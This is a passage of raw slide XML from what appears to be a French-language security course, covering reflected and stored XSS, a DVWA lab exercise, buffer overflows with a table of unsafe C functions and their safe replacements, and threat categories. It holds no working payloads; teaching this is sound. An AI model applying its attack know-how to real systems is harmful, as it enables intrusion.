              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>.</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54</a:t>
            </a:fld>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 y="2690812"/>
            <a:ext cx="5762625" cy="3933825"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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952" y="4704652"/>
            <a:ext cx="3543659" cy="1852612"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="C00000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>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6513" y="0"/>
            <a:ext cx="1635487" cy="1000918"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="ZoneTexte 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8004919" y="3585929"/>
            <a:ext cx="2931571"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fr-FR" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>Démonstration   &gt;</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="2800" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="160316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web</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="289560" y="805752"/>
            <a:ext cx="9805416" cy="1108773"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XSS (non permanent)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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55</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>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l="13390" r="17003" b="10549"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="146816" y="2198338"/>
            <a:ext cx="5949184" cy="3107087"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>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l="7177" r="18096" b="12405"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6419850" y="2198337"/>
            <a:ext cx="5603852" cy="3107087"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>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6513" y="0"/>
            <a:ext cx="1635487" cy="1000918"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5346086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web</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="289560" y="805752"/>
            <a:ext cx="9805416" cy="1108773"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XSS (permanent)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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56</a:t>
            </a:fld>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1437777"/>
            <a:ext cx="5054228" cy="5101135"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="10" name="Groupe 9"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5708464" y="1203147"/>
            <a:ext cx="6013822" cy="5518328"/>
            <a:chOff x="5737039" y="1181100"/>
            <a:chExt cx="6013822" cy="5518328"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="8" name="Image 7"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId4">
              <a:extLst>
                <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                  <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                </a:ext>
              </a:extLst>
            </a:blip>
            <a:srcRect r="16965"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="5737039" y="1181100"/>
              <a:ext cx="6013822" cy="3835566"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:ln>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8261" y="5016666"/>
              <a:ext cx="4882600" cy="1682762"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
        </p:pic>
      </p:grpSp>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6513" y="0"/>
            <a:ext cx="1635487" cy="1000918"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29973853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web</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="289560" y="805752"/>
            <a:ext cx="6349365" cy="5884607"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Travail à faire</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="4000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="4000" dirty="0" smtClean="0"/>
              <a:t>Installer la plateforme DVWA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="4000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Damn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="4000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="4000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Vulnerable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="4000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Web Application</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="4000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="4000" dirty="0" smtClean="0"/>
              <a:t>sur votre machine.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="4000" dirty="0"/>
              <a:t>À</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="4000" dirty="0" smtClean="0"/>
              <a:t> vos clavier !!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="4000" dirty="0" smtClean="0"/>
              <a:t>Amusez vous.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="4000"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57</a:t>
            </a:fld>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925" y="986279"/>
            <a:ext cx="5380863" cy="5189544"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6524625" y="3114676"/>
            <a:ext cx="1381125" cy="2095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6524625" y="3614799"/>
            <a:ext cx="1381125" cy="4714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 uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3918140" y="4175757"/>
            <a:ext cx="2305982" cy="2363155"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1932829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applicatives</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="289560" y="805753"/>
            <a:ext cx="9805416" cy="3766248"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Buffer overflow</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Buffer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>: Zone de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>mémoire</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Overflow </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Dépassement</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>La </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>faille : Copie de données sans vérification de la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>taille</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>bug par lequel un processus, lors de l'écriture dans un tampon, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>écrit à </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>l'extérieur de l'espace alloué au tampon, écrasant ainsi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>des informations </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>nécessaires au </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>processus.</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Faire </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>exécuter des instructions introduites dans le processus (Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:b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58</a:t>
            </a:fld>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693" y="4492626"/>
            <a:ext cx="7162800" cy="1943100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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l="19144" r="12384"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9988061" y="0"/>
            <a:ext cx="2203939" cy="1810512"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22701267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applicatives</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="289560" y="805753"/>
            <a:ext cx="9805416" cy="3766248"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Buffer overflow</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" lvl="1">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>Fonctions </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0"/>
              <a:t>dans le langage C pouvant </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>entraîner des débordements de tampon</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0"/>
            </a:b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59</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>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l="19144" r="12384"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9988061" y="0"/>
            <a:ext cx="2203939" cy="1810512"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="7" name="Tableau 6"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2353621431"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="220628" y="2250831"/>
          <a:ext cx="11971372" cy="3165228"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" firstCol="1" bandRow="1">
                <a:tableStyleId>{616DA210-FB5B-4158-B5E0-FEB733F419BA}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="5277495"/>
                <a:gridCol w="6693877"/>
              </a:tblGrid>
              <a:tr h="324244">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="107000"/>
                        </a:lnSpc>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1800" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Fonction vulnérable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fr-FR" sz="1800">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Fonction sécurisée</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR"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629185">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="107000"/>
                        </a:lnSpc>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1800">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>char * gets (char *buffer)</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR"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800">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>char * fgets (char *string, int count, FILE *stream)</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR"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629185">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="107000"/>
                        </a:lnSpc>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>char *strcpy( char *destination, const char *source )</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR"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800" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>char *</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>strncpy</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>( char *destination, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>const</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> char *source, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>size_t</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> count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629185">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="107000"/>
                        </a:lnSpc>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1800">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>char *strcat( char *destination, const char *source )</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR"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fr-FR" sz="1800">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>char *strncat( char *destination, const char *source, size_t count )</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR"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629185">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="107000"/>
                        </a:lnSpc>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>int sprintf (char *string, const char *format, ...)</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR"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800">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>int snprintf (char *string, size_t count, const char *format, ...)</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR"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r h="324244">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="107000"/>
                        </a:lnSpc>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>…</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR"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800" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>…</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR"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4044256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menaces</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="289559" y="805752"/>
            <a:ext cx="11619412" cy="5884607"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="3200" b="1" dirty="0" smtClean="0"/>
              <a:t>Les menaces accidentelles (non-intentionnelles) : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>qui ne </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>supposent </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>aucune préméditation. </a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Exemples : </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Evènement naturel (incendie, séisme …)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Erreur d’utilisation  : un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>employé qui accède par erreur à une information </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>erronée.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Failles techniques : les </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>bugs logiciels, les pannes matérielles, et </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>autres défaillances </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>incontrôlable ". </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="3200" b="1" dirty="0" smtClean="0"/>
              <a:t>Les menaces intentionnelles :</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="3200" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>qui </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>reposent </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>sur l’action d’un tiers </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>désirant s’introduire pour relever </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>des </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>informations (passive) et / ou porter des modifications sur le système (active). C’est une </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>action exécutée par une entité pour violer la sécurité</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
